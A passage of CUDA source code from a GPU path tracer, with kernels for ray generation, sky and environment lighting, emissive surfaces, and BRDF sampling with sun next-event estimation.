pixel_sample[1]) * camera.pixel_offset[1]), 1.0f }; p[0] *= camera.focal_depth; p[1] *= camera.focal_depth; p[2] *= camera.focal_depth; float pt[3]; TRANSFORM_X(p, camera.transform, pt); TRANSFORM_Y(p, camera.transform, pt); TRANSFORM_Z(p, camera.transform, pt); float aperture_sample[4]; PRNG(global_id, b_seeds.z, aperture_sample[0]); PRNG(global_id, b_seeds.w, aperture_sample[1]); float aperture_o[3]; CONCENTRIC_HEMI(aperture_sample[0], aperture_sample[1], aperture_o); aperture_o[0] *= camera.aperture_size; aperture_o[1] *= camera.aperture_size; aperture_o[2] = 0.0f; TRANSFORM_X(aperture_o, camera.transform, o); TRANSFORM_Y(aperture_o, camera.transform, o); TRANSFORM_Z(aperture_o, camera.transform, o); d[0] = pt[0] - o[0]; d[1] = pt[1] - o[1]; d[2] = pt[2] - o[2]; NORMALIZE(d); ray_state[RS_THROUGHPUT_R] = 1.0f; ray_state[RS_THROUGHPUT_G] = 1.0f; ray_state[RS_THROUGHPUT_B] = 1.0f; if (sample == 0) { ray_state[RS_COLOR_R] = 0.0f; ray_state[RS_COLOR_G] = 0.0f; ray_state[RS_COLOR_B] = 0.0f; } TRACE(use_nodes_image, use_triangles_image, true); ray_state[RS_LAST_BRDF_PDF] = DIRAC_PDF; return; } /// __global__ void Secondary(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, 
cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state != STATE_SECONDARY) { return; } float o[3], d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; o[0] = ray_state[RS_ORIGIN_X] + (d[0] * EPSILON); o[1] = ray_state[RS_ORIGIN_Y] + (d[1] * EPSILON); o[2] = ray_state[RS_ORIGIN_Z] + (d[2] * EPSILON); TRACE(use_triangles_image, use_nodes_image, false); } /// __global__ void EnvSky(float* ray_state, cudaTextureObject_t sun_table, Sun sun, int32_t width, int32_t height, int32_t bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; float s = -6360.5f * d_i[1]; float mu = -s * 0.00015722034f; float nu = d_i[0] * sun.direction[0] + d_i[1] * sun.direction[1] + d_i[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / (raymie.x) * (beta_r.x / beta_r) * \ (1.0f + (d_i[1] * 3.0f)); float4 result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; float sun_delta = sun.direction[0] * d_i[0] + sun.direction[1] * d_i[1] + sun.direction[2] * d_i[2]; float color[3] = { result.x, result.y, result.z }; float mis = 1.0f; if ((brdf_pdf != -1.0f) && (sun_delta >= SUN_COS_THETA)) { float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { if (sun.sun_intensity > 0.0f) { mis = MIS(brdf_pdf, sun_pdf); } else { sun.sun_intensity *= 0.05f; } } else { if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } sun.sun_intensity *= 0.05f; } } else { sun.sun_intensity *= 0.05f; } float horizon_falloff = fabs(d_i[1] - 0.075f) - (d_i[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); color[0] *= multiplier; color[1] *= multiplier; color[2] *= multiplier; } else if (bounce > 0) { float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 
10.0f)); float max_component = fmax(color[0], fmax(color[1], color[2])); color[0] = lerp(color[0], max_component * 1.0f, horizon_bias); color[1] = lerp(color[1], max_component * 0.98f, horizon_bias); color[2] = lerp(color[2], max_component * 0.73f, horizon_bias); color[0] *= sun.color[0]; color[1] *= sun.color[1]; color[2] *= sun.color[2]; } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void EnvMap(float* ray_state, cudaTextureObject_t environment_map, EnvironmentProperties environment_properties, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; NORMALIZE(d_i); float2 uv = make_float2(1.0f + atan2(d_i[0], -d_i[2]), acos(-d_i[1]) * INV_PI); uv.x *= INV_TAU; uv.x += environment_properties.rotation; float4 color = tex2D<float4>(environment_map, uv.x, uv.y); color.x *= environment_properties.intensity; color.y *= environment_properties.intensity; color.z *= environment_properties.intensity; ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color.x; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color.y; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color.z; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void Emission(float* ray_state, Material* materials, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t emission_atlas, int32_t emitter_count, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_EMISSIVE) { return; } float d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; int tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; float vn[3]; if (use_triangles_image) { vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } NORMALIZE(vn); float dot_ni = DOT(-d, vn); if (dot_ni <= 0.0f) { ray_state[RS_STATE] = STATE_END; return; } else { uint mat_id; float uv[2]; float inverse_area; if (use_triangles_image) { mat_id = 
tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); } else { mat_id = triangles[tri_index].material_id; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; inverse_area = triangles[tri_index].inverse_area; } float t = ray_state[RS_HIT_DISTANCE]; float t_2 = t * t; float emitter_color[3]; float intensity = materials[mat_id].emission * 25.0f; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; emission_uv.x = uv[0]; emission_uv.y = uv[1]; emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] * intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; if (brdf_pdf == -1.0f) { ray_state[RS_STATE] = STATE_END; return; } float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(dot_ni)) * emitter_prob; float mis = 1.0f; if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { mis = MIS(brdf_pdf, emitter_pdf); } else if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * emitter_color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * emitter_color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * emitter_color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } } /// __global__ void Sample(float* ray_state, Material* materials, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t normal_atlas, cudaTextureObject_t metallic_atlas, cudaTextureObject_t emission_atlas, cudaTextureObject_t sun_table, Sun sun, cudaTextureObject_t environment_map, EnvironmentProperties environment_properties, EmitterIndex* emitters, int32_t emitter_count, PortalIndex* portals, int32_t portal_count, uint4 b_seeds_0, uint4 b_seeds_1, uint4 b_seeds_2, uint4 b_seeds_3, int32_t width, int32_t height, int32_t sample_sun) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float last_brdf_pdf; float new_brdf_pdf; float sn[3]; float vn[3]; float n[3]; float n_tangent[3]; float n_binormal[3]; float ld_i[3]; float old_throughput[3]; float albedo[3]; float metallic; float smoothness; bool glass_material; { float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 
1.0f - u - v; uint32_t tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; uint32_t mat_id; float uv[2]; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); sn[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); sn[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); sn[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[tri_index].material_id; sn[0] = triangles[tri_index].surface_normal[0]; sn[1] = triangles[tri_index].surface_normal[1]; sn[2] = triangles[tri_index].surface_normal[2]; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } glass_material = (materials[mat_id].glass > 0.0f); float d_i[3]; d_i[0] = -ray_state[RS_DIR_X]; d_i[1] = -ray_state[RS_DIR_Y]; d_i[2] = -ray_state[RS_DIR_Z]; albedo[0] = materials[mat_id].albedo[0]; albedo[1] = materials[mat_id].albedo[1]; albedo[2] = materials[mat_id].albedo[2]; if (materials[mat_id].map_flags & MAP_FLAG_ALBEDO) { float2 albedo_uv; albedo_uv.x = uv[0]; albedo_uv.y = uv[1]; albedo_uv.x = lerp(materials[mat_id].albedo_bounds[0] + 0.5f, materials[mat_id].albedo_bounds[1] - 0.5f, albedo_uv.x); albedo_uv.y = lerp(materials[mat_id].albedo_bounds[2] + 0.5f, materials[mat_id].albedo_bounds[3] - 0.5f, albedo_uv.y); float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, albedo_uv.y); albedo[0] *= albedo_map.y; albedo[1] *= albedo_map.z; albedo[2] *= albedo_map.w; } if (materials[mat_id].map_flags & MAP_FLAG_NORMAL) { float2 normal_uv; normal_uv.x = uv[0]; normal_uv.y = uv[1]; normal_uv.x = lerp(materials[mat_id].normal_bounds[0] + 0.5f, materials[mat_id].normal_bounds[1] - 0.5f, normal_uv.x); normal_uv.y = lerp(materials[mat_id].normal_bounds[2] + 0.5f, materials[mat_id].normal_bounds[3] - 0.5f, normal_uv.y); float4 normal_map = tex2D<float4>(normal_atlas, normal_uv.x, normal_uv.y); float vn_tangent[3], vn_binormal[3]; GET_VT_BASIS(vn, vn_tangent, vn_binormal); float ln[3]; ln[0] = normal_map.x * 2.0f - 1.0f; ln[1] = normal_map.z * 2.0f - 1.0f; ln[2] = sqrt(1.0f 
- saturate(ln[0] * ln[0] + ln[1] * ln[1])); ROTATE_TO_BASIS(ln, vn, vn_tangent, vn_binormal, n); } else { n[0] = vn[0]; n[1] = vn[1]; n[2] = vn[2]; } NORMALIZE(n); if (!glass_material && (DOT(d_i, sn) < 0.0f)) { n[0] = -n[0]; n[1] = -n[1]; n[2] = -n[2]; } metallic = materials[mat_id].metallic; smoothness = materials[mat_id].smoothness; if (materials[mat_id].map_flags & MAP_FLAG_METALLIC) { float2 metallic_uv; metallic_uv.x = uv[0]; metallic_uv.y = uv[1]; metallic_uv.x = lerp(materials[mat_id].metallic_bounds[0] + 0.5f, materials[mat_id].metallic_bounds[1] - 0.5f, metallic_uv.x); metallic_uv.y = lerp(materials[mat_id].metallic_bounds[2] + 0.5f, materials[mat_id].metallic_bounds[3] - 0.5f, metallic_uv.y); float4 metallic_map = tex2D<float4>(metallic_atlas, metallic_uv.x, metallic_uv.y); metallic *= metallic_map.y; smoothness *= metallic_map.x; } float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; GET_BASIS(n, n_tangent, n_binormal); RELATIVE_TO_BASIS(d_i, n, n_tangent, n_binormal, ld_i); float ggx_pdf; float ln_facet[3]; if (smoothness == 1.0f) { ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; ggx_pdf = DIRAC_PDF; } else { float ggx_samples[2]; PRNG(global_id, b_seeds_0.x, ggx_samples[0]); PRNG(global_id, b_seeds_0.y, ggx_samples[1]); GGX_SAMPLE(ld_i, roughness, ggx_samples[0], ggx_samples[1], ln_facet); float g1, eval; SMITH_G1(ld_i, ln_facet, roughness, g1); GGX_EVAL(ln_facet, roughness, eval); ggx_pdf = g1 * fabs(DOT(ld_i, ln_facet)) * eval / fabs(ld_i[2]); } if (ld_i[2] == 0.0f) { ggx_pdf = 0.0f; } last_brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float brdf_color[3]; float ld_o[3]; float sample_dice; PRNG(global_id, b_seeds_0.z, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface float fresnel, cos_theta_t; DIELECTRIC_FRESNEL(ld_i[2], 1.5f, cos_theta_t, fresnel); float reflect_sample; PRNG(global_id, b_seeds_0.w, reflect_sample); if (reflect_sample <= (fresnel * coating_dropoff)) { // Reflect float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = 1.0f; brdf_color[1] = 1.0f; brdf_color[2] = 1.0f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf; new_brdf_pdf *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Transmit if (glass_material) { // Refract float ior = (cos_theta_t < 0.0f) ? 
(1.0f / 1.5f) : 1.5f; float ior_2 = ior * ior; float dot_ni = DOT(ln_facet, ld_i); float c = dot_ni * ior + cos_theta_t; ld_o[0] = ln_facet[0] * c - ld_i[0] * ior; ld_o[1] = ln_facet[1] * c - ld_i[1] * ior; ld_o[2] = ln_facet[2] * c - ld_i[2] * ior; copysign(ld_o[2], -ld_o[1]); NORMALIZE(ld_o); if ((cos_theta_t == 0.0f) || (ld_i[2] * ld_o[2] >= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { brdf_color[0] = albedo[0] * ior_2; brdf_color[1] = albedo[1] * ior_2; brdf_color[2] = albedo[2] * ior_2; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { float dot_no = DOT(ln_facet, ld_o); new_brdf_pdf = ggx_pdf; float sqrt_denom = dot_ni + ior * dot_no; float dwh_dwo = (ior_2 * dot_no) / (sqrt_denom * sqrt_denom); new_brdf_pdf *= fabs(dwh_dwo); } } } } else { // Diffuse ln_facet[0] = 0.0f; ln_facet[1] = 0.0f; ln_facet[2] = 1.0f; float ln_tangent[3]; float ln_binormal[3]; GET_BASIS(ln_facet, ln_tangent, ln_binormal); float hemi_sample[2]; PRNG(global_id, b_seeds_1.x, hemi_sample[0]); PRNG(global_id, b_seeds_1.y, hemi_sample[1]); float hemi_d[3]; CONCENTRIC_HEMI(hemi_sample[0], hemi_sample[1], hemi_d); ROTATE_TO_BASIS(hemi_d, ln_facet, ln_tangent, ln_binormal, ld_o); ld_o[2] = fabs(ld_o[2]); brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; new_brdf_pdf = INV_PI * ld_o[2]; } } } else { // Conductor float dot_ni = DOT(ln_facet, ld_i); ld_o[0] = 2.0f * ln_facet[0] * dot_ni - ld_i[0]; ld_o[1] = 2.0f * ln_facet[1] * dot_ni - ld_i[1]; ld_o[2] = 2.0f * ln_facet[2] * dot_ni - ld_i[2]; ld_o[2] = fabs(ld_o[2]); NORMALIZE(ld_o); if ((ggx_pdf == 0.0f) || (ld_o[2] <= 0.0f)) { brdf_color[0] = 0.0f; brdf_color[1] = 0.0f; brdf_color[2] = 0.0f; new_brdf_pdf = -1.0f; } else { float f; CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); brdf_color[0] = albedo[0] * f; brdf_color[1] = albedo[1] * f; brdf_color[2] = albedo[2] * f; /* float weight; SMITH_G1(ld_o, ln_facet, roughness, weight); brdf_color[0] *= weight; brdf_color[1] *= weight; brdf_color[2] *= weight; */ if (last_brdf_pdf != DIRAC_PDF) { new_brdf_pdf = -1.0f; } else { if (ggx_pdf == DIRAC_PDF) { new_brdf_pdf = DIRAC_PDF; } else { new_brdf_pdf = ggx_pdf / (4.0f * DOT(ld_o, ln_facet)); } } } } float d_o[3]; ROTATE_TO_BASIS(ld_o, n, n_tangent, n_binormal, d_o); ray_state[RS_LAST_BRDF_PDF] = new_brdf_pdf; old_throughput[0] = ray_state[RS_THROUGHPUT_R]; old_throughput[1] = ray_state[RS_THROUGHPUT_G]; old_throughput[2] = ray_state[RS_THROUGHPUT_B]; ray_state[RS_THROUGHPUT_R] = old_throughput[0] * brdf_color[0]; ray_state[RS_THROUGHPUT_G] = old_throughput[1] * brdf_color[1]; ray_state[RS_THROUGHPUT_B] = old_throughput[2] * brdf_color[2]; ray_state[RS_DIR_X] = d_o[0]; ray_state[RS_DIR_Y] = d_o[1]; ray_state[RS_DIR_Z] = d_o[2]; ray_state[RS_STATE] = STATE_SECONDARY; } float sun_d[3]; sun_d[0] = FLT_MAX; if (sample_sun > 0) { float theta, z; PRNG(global_id, b_seeds_1.z, theta); PRNG(global_id, b_seeds_1.w, z); theta *= TAU; z = (z * (1.0f - SUN_COS_THETA)) + SUN_COS_THETA; float z2 = sqrt(1.0f - (z * z)); float sun_ld_o[3]; sun_ld_o[0] = z2 * cos(theta); sun_ld_o[1] = z2 * sin(theta); sun_ld_o[2] = z; float sun_tangent[3]; float sun_binormal[3]; GET_BASIS(sun.direction, sun_tangent, sun_binormal); ROTATE_TO_BASIS(sun_ld_o, sun.direction, sun_tangent, sun_binormal, sun_d); 
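// Sun next-event estimation: the two PRNG draws above pick a direction
// uniformly inside the sun's cone -- z, the cosine of the angle to the sun
// axis, is uniform on [SUN_COS_THETA, 1] and theta is uniform on [0, TAU) --
// and ROTATE_TO_BASIS turns that local sample into the world-space direction
// sun_d around sun.direction. The matching solid-angle PDF,
// 1 / (TAU * (1 - SUN_COS_THETA)), is the sun_pdf used for MIS further down.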
sun_d[1] = fmax(0.01f, sun_d[1]); NORMALIZE(sun_d); float cos_at_tri = DOT(sun_d, n); if (cos_at_tri <= 0.0f) { sun_d[0] = FLT_MAX; } else { float sun_color[3]; float brdf_color[3]; float brdf_pdf; float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); float s = -6360.5f * sun_d[1]; float mu = -s * 0.00015722034f; float nu = sun_d[0] * sun.direction[0] + sun_d[1] * sun.direction[1] + sun_d[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / NOT_ZERO(raymie.x) * (beta_r.x / beta_r); float4 sun_result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; sun_result.x *= sun.color[0]; sun_result.y *= sun.color[1]; sun_result.z *= sun.color[2]; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float horizon_falloff = fabs(sun_d[1] - 0.075f) - (sun_d[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); sun_color[0] = sun_result.x * multiplier; sun_color[1] = sun_result.y * multiplier; sun_color[2] = sun_result.z * multiplier; float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 10.0f)); float max_component = fmax(sun_color[0], fmax(sun_color[1], sun_color[2])); sun_color[0] = lerp(sun_color[0], max_component * 1.0f, horizon_bias); sun_color[1] = lerp(sun_color[1], max_component * 0.98f, horizon_bias); sun_color[2] = lerp(sun_color[2], max_component * 0.73f, horizon_bias); float ld_o[3]; RELATIVE_TO_BASIS(sun_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = glass_material && ((ld_i[2] * ld_o[2]) < 0.0f); if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? 
